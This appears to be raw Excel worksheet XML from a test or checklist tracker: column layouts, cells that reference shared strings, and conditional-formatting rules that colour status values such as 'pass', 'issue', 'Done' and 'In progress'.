      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="25" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12:H14">
    <cfRule type="cellIs" dxfId="3" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I4:I8">
    <cfRule type="containsText" dxfId="0" priority="30" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="29" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="28" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I4)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I12:I14">
    <cfRule type="containsText" dxfId="0" priority="6" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="5" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="4" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I12)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H4:H14">
      <formula1>$A$16:$A$23</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0"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C27" sqref="$A1:$XFD1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.1"/>
  <cols>
    <col min="1" max="1" width="9" style="11"/>
    <col min="2" max="2" width="12.5765765765766" style="11" customWidth="1"/>
    <col min="3" max="3" width="41.1891891891892" style="11" customWidth="1"/>
    <col min="4" max="4" width="86.3873873873874" style="11" customWidth="1"/>
    <col min="5" max="5" width="31.9459459459459" style="11" customWidth="1"/>
    <col min="6" max="6" width="19.7567567567568" style="11" customWidth="1"/>
    <col min="7" max="7" width="17.3243243243243" style="11" customWidth="1"/>
    <col min="8" max="8" width="9" style="11"/>
    <col min="9" max="9" width="14.7477477477477" style="11" customWidth="1"/>
    <col min="10" max="10" width="12.8558558558559" style="11" customWidth="1"/>
    <col min="11" max="16384" width="9" style="11"/>
  </cols>
  <sheetData>
    <row r="1" s="11" customFormat="1" ht="18.4" spans="1:10">
      <c r="A1" s="1" t="s">
        <v>316</v>
      </c>
      <c r="B1" s="1"/>
      <c r="C1" s="1"/>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="1"/>
    </row>
    <row r="3" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A3" s="5" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="5" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="5" t="s">
        <v>3</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>4</v>
      </c>
      <c r="E3" s="5" t="s">
        <v>5</v>
      </c>
      <c r="F3" s="5" t="s">
        <v>6</v>
      </c>
      <c r="G3" s="5" t="s">
        <v>7</v>
      </c>
      <c r="H3" s="5" t="s">
        <v>8</v>
      </c>
      <c r="I3" s="5" t="s">
        <v>9</v>
      </c>
      <c r="J3" s="5" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="4" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A4" s="12" t="s">
        <v>317</v>
      </c>
      <c r="B4" s="13" t="s">
        <v>318</v>
      </c>
      <c r="C4" s="14" t="s">
        <v>319</v>
      </c>
      <c r="D4" s="15" t="s">
        <v>320</v>
      </c>
      <c r="E4" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F4" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G4" s="17" t="s">
        <v>322</v>
      </c>
      <c r="H4" s="17"/>
      <c r="I4" s="32"/>
      <c r="J4" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="5" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A5" s="12" t="s">
        <v>323</v>
      </c>
      <c r="B5" s="13" t="s">
        <v>324</v>
      </c>
      <c r="C5" s="14" t="s">
        <v>325</v>
      </c>
      <c r="D5" s="15" t="s">
        <v>326</v>
      </c>
      <c r="E5" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F5" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G5" s="17" t="s">
        <v>322</v>
      </c>
      <c r="H5" s="17"/>
      <c r="I5" s="32"/>
      <c r="J5" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="6" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A6" s="12" t="s">
        <v>327</v>
      </c>
      <c r="B6" s="13" t="s">
        <v>328</v>
      </c>
      <c r="C6" s="14" t="s">
        <v>329</v>
      </c>
      <c r="D6" s="15" t="s">
        <v>330</v>
      </c>
      <c r="E6" s="37" t="s">
        <v>16</v>
      </c>
      <c r="F6" s="38" t="s">
        <v>16</v>
      </c>
      <c r="G6" s="38" t="s">
        <v>16</v>
      </c>
      <c r="H6" s="17"/>
      <c r="I6" s="32"/>
      <c r="J6" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="7" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A7" s="12" t="s">
        <v>331</v>
      </c>
      <c r="B7" s="13" t="s">
        <v>332</v>
      </c>
      <c r="C7" s="14" t="s">
        <v>333</v>
      </c>
      <c r="D7" s="15" t="s">
        <v>334</v>
      </c>
      <c r="E7" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F7" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G7" s="17" t="s">
        <v>335</v>
      </c>
      <c r="H7" s="17"/>
      <c r="I7" s="32"/>
      <c r="J7" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="8" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A8" s="12" t="s">
        <v>336</v>
      </c>
      <c r="B8" s="13" t="s">
        <v>337</v>
      </c>
      <c r="C8" s="14" t="s">
        <v>338</v>
      </c>
      <c r="D8" s="15" t="s">
        <v>339</v>
      </c>
      <c r="E8" s="16" t="s">
        <v>340</v>
      </c>
      <c r="F8" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G8" s="17" t="s">
        <v>341</v>
      </c>
      <c r="H8" s="17"/>
      <c r="I8" s="32"/>
      <c r="J8" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="9" s="11" customFormat="1" ht="84.85" spans="1:10">
      <c r="A9" s="12" t="s">
        <v>342</v>
      </c>
      <c r="B9" s="13" t="s">
        <v>343</v>
      </c>
      <c r="C9" s="35" t="s">
        <v>344</v>
      </c>
      <c r="D9" s="36" t="s">
        <v>345</v>
      </c>
      <c r="E9" s="39" t="s">
        <v>51</v>
      </c>
      <c r="F9" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G9" s="17" t="s">
        <v>346</v>
      </c>
      <c r="H9" s="17"/>
      <c r="I9" s="32"/>
      <c r="J9" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="10" s="11" customFormat="1" ht="42.45" spans="1:10">
      <c r="A10" s="12" t="s">
        <v>347</v>
      </c>
      <c r="B10" s="13" t="s">
        <v>348</v>
      </c>
      <c r="C10" s="35" t="s">
        <v>349</v>
      </c>
      <c r="D10" s="36" t="s">
        <v>350</v>
      </c>
      <c r="E10" s="39" t="s">
        <v>351</v>
      </c>
      <c r="F10" s="34" t="s">
        <v>109</v>
      </c>
      <c r="G10" s="34" t="s">
        <v>352</v>
      </c>
      <c r="H10" s="17"/>
      <c r="I10" s="32"/>
      <c r="J10" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="11" s="11" customFormat="1" ht="42.45" spans="1:10">
      <c r="A11" s="12" t="s">
        <v>353</v>
      </c>
      <c r="B11" s="13" t="s">
        <v>354</v>
      </c>
      <c r="C11" s="35" t="s">
        <v>355</v>
      </c>
      <c r="D11" s="36" t="s">
        <v>356</v>
      </c>
      <c r="E11" s="39" t="s">
        <v>51</v>
      </c>
      <c r="F11" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G11" s="17" t="s">
        <v>357</v>
      </c>
      <c r="H11" s="17"/>
      <c r="I11" s="32"/>
      <c r="J11" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="12" s="11" customFormat="1" ht="42.45" spans="1:10">
      <c r="A12" s="12" t="s">
        <v>358</v>
      </c>
      <c r="B12" s="13" t="s">
        <v>359</v>
      </c>
      <c r="C12" s="35" t="s">
        <v>360</v>
      </c>
      <c r="D12" s="36" t="s">
        <v>361</v>
      </c>
      <c r="E12" s="39" t="s">
        <v>51</v>
      </c>
      <c r="F12" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G12" s="17" t="s">
        <v>362</v>
      </c>
      <c r="H12" s="17"/>
      <c r="I12" s="32"/>
      <c r="J12" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="13" s="11" customFormat="1" ht="42.45" spans="1:10">
      <c r="A13" s="12" t="s">
        <v>363</v>
      </c>
      <c r="B13" s="13" t="s">
        <v>364</v>
      </c>
      <c r="C13" s="35" t="s">
        <v>365</v>
      </c>
      <c r="D13" s="36" t="s">
        <v>366</v>
      </c>
      <c r="E13" s="39" t="s">
        <v>51</v>
      </c>
      <c r="F13" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G13" s="17" t="s">
        <v>367</v>
      </c>
      <c r="H13" s="17"/>
      <c r="I13" s="32"/>
      <c r="J13" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="14" s="11" customFormat="1" ht="84.85" spans="1:10">
      <c r="A14" s="12" t="s">
        <v>368</v>
      </c>
      <c r="B14" s="13" t="s">
        <v>369</v>
      </c>
      <c r="C14" s="35" t="s">
        <v>370</v>
      </c>
      <c r="D14" s="36" t="s">
        <v>371</v>
      </c>
      <c r="E14" s="16" t="s">
        <v>372</v>
      </c>
      <c r="F14" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G14" s="17" t="s">
        <v>373</v>
      </c>
      <c r="H14" s="17"/>
      <c r="I14" s="32"/>
      <c r="J14" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="15" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A15" s="12" t="s">
        <v>374</v>
      </c>
      <c r="B15" s="13" t="s">
        <v>375</v>
      </c>
      <c r="C15" s="35" t="s">
        <v>376</v>
      </c>
      <c r="D15" s="40" t="s">
        <v>377</v>
      </c>
      <c r="E15" s="16" t="s">
        <v>378</v>
      </c>
      <c r="F15" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G15" s="17" t="s">
        <v>379</v>
      </c>
      <c r="H15" s="35"/>
      <c r="I15" s="35"/>
      <c r="J15" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="16" s="11" customFormat="1" ht="42.45" spans="1:10">
      <c r="A16" s="12" t="s">
        <v>380</v>
      </c>
      <c r="B16" s="13" t="s">
        <v>381</v>
      </c>
      <c r="C16" s="35" t="s">
        <v>382</v>
      </c>
      <c r="D16" s="35" t="s">
        <v>383</v>
      </c>
      <c r="E16" s="16" t="s">
        <v>384</v>
      </c>
      <c r="F16" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G16" s="17" t="s">
        <v>385</v>
      </c>
      <c r="H16" s="35"/>
      <c r="I16" s="35"/>
      <c r="J16" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="17" s="11" customFormat="1" ht="56.55" spans="1:10">
      <c r="A17" s="12" t="s">
        <v>386</v>
      </c>
      <c r="B17" s="13" t="s">
        <v>387</v>
      </c>
      <c r="C17" s="14" t="s">
        <v>388</v>
      </c>
      <c r="D17" s="41" t="s">
        <v>389</v>
      </c>
      <c r="E17" s="16" t="s">
        <v>390</v>
      </c>
      <c r="F17" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G17" s="17" t="s">
        <v>391</v>
      </c>
      <c r="H17" s="14"/>
      <c r="I17" s="14"/>
      <c r="J17" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="18" s="11" customFormat="1" ht="42.45" spans="1:10">
      <c r="A18" s="12" t="s">
        <v>392</v>
      </c>
      <c r="B18" s="13" t="s">
        <v>393</v>
      </c>
      <c r="C18" s="14" t="s">
        <v>394</v>
      </c>
      <c r="D18" s="41" t="s">
        <v>395</v>
      </c>
      <c r="E18" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F18" s="17" t="s">
        <v>396</v>
      </c>
      <c r="G18" s="17" t="s">
        <v>397</v>
      </c>
      <c r="H18" s="14"/>
      <c r="I18" s="14"/>
      <c r="J18" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="19" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A19" s="12" t="s">
        <v>398</v>
      </c>
      <c r="B19" s="13" t="s">
        <v>399</v>
      </c>
      <c r="C19" s="14" t="s">
        <v>400</v>
      </c>
      <c r="D19" s="41" t="s">
        <v>401</v>
      </c>
      <c r="E19" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F19" s="38" t="s">
        <v>16</v>
      </c>
      <c r="G19" s="38" t="s">
        <v>16</v>
      </c>
      <c r="H19" s="14"/>
      <c r="I19" s="14"/>
      <c r="J19" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="20" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A20" s="12" t="s">
        <v>402</v>
      </c>
      <c r="B20" s="13" t="s">
        <v>403</v>
      </c>
      <c r="C20" s="14" t="s">
        <v>404</v>
      </c>
      <c r="D20" s="41" t="s">
        <v>405</v>
      </c>
      <c r="E20" s="16" t="s">
        <v>406</v>
      </c>
      <c r="F20" s="17" t="s">
        <v>157</v>
      </c>
      <c r="G20" s="17" t="s">
        <v>407</v>
      </c>
      <c r="H20" s="14"/>
      <c r="I20" s="14"/>
      <c r="J20" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="21" ht="42.45" spans="1:10">
      <c r="A21" s="12" t="s">
        <v>408</v>
      </c>
      <c r="B21" s="13" t="s">
        <v>409</v>
      </c>
      <c r="C21" s="14" t="s">
        <v>410</v>
      </c>
      <c r="D21" s="41" t="s">
        <v>411</v>
      </c>
      <c r="E21" s="16" t="s">
        <v>412</v>
      </c>
      <c r="F21" s="17" t="s">
        <v>157</v>
      </c>
      <c r="G21" s="17" t="s">
        <v>413</v>
      </c>
      <c r="H21" s="14"/>
      <c r="I21" s="14"/>
      <c r="J21" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="22" ht="42.45" spans="1:10">
      <c r="A22" s="12" t="s">
        <v>414</v>
      </c>
      <c r="B22" s="13" t="s">
        <v>415</v>
      </c>
      <c r="C22" s="14" t="s">
        <v>416</v>
      </c>
      <c r="D22" s="41" t="s">
        <v>417</v>
      </c>
      <c r="E22" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F22" s="17" t="s">
        <v>418</v>
      </c>
      <c r="G22" s="17" t="s">
        <v>419</v>
      </c>
      <c r="H22" s="14"/>
      <c r="I22" s="14"/>
      <c r="J22" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="23" ht="29.15" spans="1:10">
      <c r="A23" s="12" t="s">
        <v>420</v>
      </c>
      <c r="B23" s="13" t="s">
        <v>421</v>
      </c>
      <c r="C23" s="14" t="s">
        <v>422</v>
      </c>
      <c r="D23" s="41" t="s">
        <v>423</v>
      </c>
      <c r="E23" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F23" s="17" t="s">
        <v>157</v>
      </c>
      <c r="G23" s="17" t="s">
        <v>424</v>
      </c>
      <c r="H23" s="14"/>
      <c r="I23" s="14"/>
      <c r="J23" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="27" ht="14.15" spans="1:1">
      <c r="A27" s="25" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="28" ht="14.15" spans="1:1">
      <c r="A28" s="27" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="29" ht="14.15" spans="1:1">
      <c r="A29" s="28" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="30" ht="14.15" spans="1:1">
      <c r="A30" s="17" t="s">
        <v>70</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A1:J1"/>
    <mergeCell ref="A2:J2"/>
  </mergeCells>
  <conditionalFormatting sqref="I1:J1">
    <cfRule type="containsText" dxfId="0" priority="42" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="41" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="40" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H9">
    <cfRule type="cellIs" dxfId="3" priority="21" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="20" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="19" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I9">
    <cfRule type="containsText" dxfId="0" priority="24" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I9)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="23" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I9)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="22" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I9)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H10">
    <cfRule type="cellIs" dxfId="3" priority="15" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="14" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="13" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I10">
    <cfRule type="containsText" dxfId="0" priority="18" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="17" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="16" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I10)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H11">
    <cfRule type="cellIs" dxfId="3" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I11">
    <cfRule type="containsText" dxfId="0" priority="12" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I11)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="11" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I11)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="10" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I11)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A28">
    <cfRule type="cellIs" dxfId="5" priority="37" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="38" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="39" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A29">
    <cfRule type="cellIs" dxfId="5" priority="34" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="35" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="36" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A30">
    <cfRule type="cellIs" dxfId="5" priority="31" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="32" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="33" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H4:H8">
    <cfRule type="cellIs" dxfId="3" priority="27" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="26" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="25" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12:H14">
    <cfRule type="cellIs" dxfId="3" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I4:I8">
    <cfRule type="containsText" dxfId="0" priority="30" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="29" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="28" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I4)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I12:I14">
    <cfRule type="containsText" dxfId="0" priority="6" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="5" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="4" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I12)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H4:H14">
      <formula1>$A$16:$A$23</formula1>
    </dataValidation>
  </dataValidation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30"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C19" sqref="$A1:$XFD1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.1"/>
  <cols>
    <col min="1" max="1" width="9" style="11"/>
    <col min="2" max="2" width="12.5765765765766" style="11" customWidth="1"/>
    <col min="3" max="3" width="41.1891891891892" style="11" customWidth="1"/>
    <col min="4" max="4" width="86.3873873873874" style="11" customWidth="1"/>
    <col min="5" max="5" width="31.9459459459459" style="11" customWidth="1"/>
    <col min="6" max="6" width="19.7567567567568" style="11" customWidth="1"/>
    <col min="7" max="7" width="17.3243243243243" style="11" customWidth="1"/>
    <col min="8" max="8" width="9" style="11"/>
    <col min="9" max="9" width="14.7477477477477" style="11" customWidth="1"/>
    <col min="10" max="10" width="12.8558558558559" style="11" customWidth="1"/>
    <col min="11" max="16384" width="9" style="11"/>
  </cols>
  <sheetData>
    <row r="1" s="11" customFormat="1" ht="18.4" spans="1:10">
      <c r="A1" s="1" t="s">
        <v>425</v>
      </c>
      <c r="B1" s="1"/>
      <c r="C1" s="1"/>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="1"/>
    </row>
    <row r="3" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A3" s="5" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="5" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="5" t="s">
        <v>3</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>4</v>
      </c>
      <c r="E3" s="5" t="s">
        <v>5</v>
      </c>
      <c r="F3" s="5" t="s">
        <v>6</v>
      </c>
      <c r="G3" s="5" t="s">
        <v>7</v>
      </c>
      <c r="H3" s="5" t="s">
        <v>8</v>
      </c>
      <c r="I3" s="5" t="s">
        <v>9</v>
      </c>
      <c r="J3" s="5" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="4" s="11" customFormat="1" ht="99" spans="1:10">
      <c r="A4" s="12" t="s">
        <v>426</v>
      </c>
      <c r="B4" s="13" t="s">
        <v>427</v>
      </c>
      <c r="C4" s="14" t="s">
        <v>428</v>
      </c>
      <c r="D4" s="15" t="s">
        <v>429</v>
      </c>
      <c r="E4" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F4" s="17" t="s">
        <v>109</v>
      </c>
      <c r="G4" s="17" t="s">
        <v>430</v>
      </c>
      <c r="H4" s="17"/>
      <c r="I4" s="32"/>
      <c r="J4" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="5" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A5" s="12" t="s">
        <v>431</v>
      </c>
      <c r="B5" s="13" t="s">
        <v>432</v>
      </c>
      <c r="C5" s="14" t="s">
        <v>433</v>
      </c>
      <c r="D5" s="15" t="s">
        <v>434</v>
      </c>
      <c r="E5" s="37" t="s">
        <v>16</v>
      </c>
      <c r="F5" s="38" t="s">
        <v>16</v>
      </c>
      <c r="G5" s="38" t="s">
        <v>16</v>
      </c>
      <c r="H5" s="17"/>
      <c r="I5" s="32"/>
      <c r="J5" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="6" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A6" s="18"/>
      <c r="B6" s="19"/>
      <c r="C6" s="20"/>
      <c r="D6" s="21"/>
      <c r="E6" s="22"/>
      <c r="F6" s="23"/>
      <c r="G6" s="23"/>
      <c r="H6" s="24"/>
      <c r="I6" s="33"/>
      <c r="J6" s="20"/>
    </row>
    <row r="7" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A7" s="18"/>
      <c r="B7" s="19"/>
      <c r="C7" s="20"/>
      <c r="D7" s="21"/>
      <c r="E7" s="26"/>
      <c r="F7" s="24"/>
      <c r="G7" s="24"/>
      <c r="H7" s="24"/>
      <c r="I7" s="33"/>
      <c r="J7" s="20"/>
    </row>
    <row r="8" s="11" customFormat="1" ht="14.55" spans="1:10">
      <c r="A8" s="25" t="s">
        <v>67</v>
      </c>
      <c r="B8" s="19"/>
      <c r="C8" s="20"/>
      <c r="D8" s="21"/>
      <c r="E8" s="26"/>
      <c r="F8" s="24"/>
      <c r="G8" s="24"/>
      <c r="H8" s="24"/>
      <c r="I8" s="33"/>
      <c r="J8" s="20"/>
    </row>
    <row r="9" s="11" customFormat="1" ht="14.55" spans="1:10">
      <c r="A9" s="27" t="s">
        <v>68</v>
      </c>
      <c r="B9" s="19"/>
      <c r="C9" s="20"/>
      <c r="D9" s="21"/>
      <c r="E9" s="29"/>
      <c r="F9" s="24"/>
      <c r="G9" s="24"/>
      <c r="H9" s="24"/>
      <c r="I9" s="33"/>
      <c r="J9" s="20"/>
    </row>
    <row r="10" s="11" customFormat="1" ht="14.55" spans="1:10">
      <c r="A10" s="28" t="s">
        <v>69</v>
      </c>
      <c r="B10" s="19"/>
      <c r="C10" s="20"/>
      <c r="D10" s="21"/>
      <c r="E10" s="29"/>
      <c r="F10" s="30"/>
      <c r="G10" s="30"/>
      <c r="H10" s="24"/>
      <c r="I10" s="33"/>
      <c r="J10" s="20"/>
    </row>
    <row r="11" s="11" customFormat="1" ht="14.55" spans="1:10">
      <c r="A11" s="17" t="s">
        <v>70</v>
      </c>
      <c r="B11" s="19"/>
      <c r="C11" s="20"/>
      <c r="D11" s="21"/>
      <c r="E11" s="29"/>
      <c r="F11" s="24"/>
      <c r="G11" s="24"/>
      <c r="H11" s="24"/>
      <c r="I11" s="33"/>
      <c r="J11" s="20"/>
    </row>
    <row r="12" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A12" s="18"/>
      <c r="B12" s="19"/>
      <c r="C12" s="20"/>
      <c r="D12" s="21"/>
      <c r="E12" s="29"/>
      <c r="F12" s="24"/>
      <c r="G12" s="24"/>
      <c r="H12" s="24"/>
      <c r="I12" s="33"/>
      <c r="J12" s="20"/>
    </row>
    <row r="13" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A13" s="18"/>
      <c r="B13" s="19"/>
      <c r="C13" s="20"/>
      <c r="D13" s="21"/>
      <c r="E13" s="29"/>
      <c r="F13" s="24"/>
      <c r="G13" s="24"/>
      <c r="H13" s="24"/>
      <c r="I13" s="33"/>
      <c r="J13" s="20"/>
    </row>
    <row r="14" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A14" s="18"/>
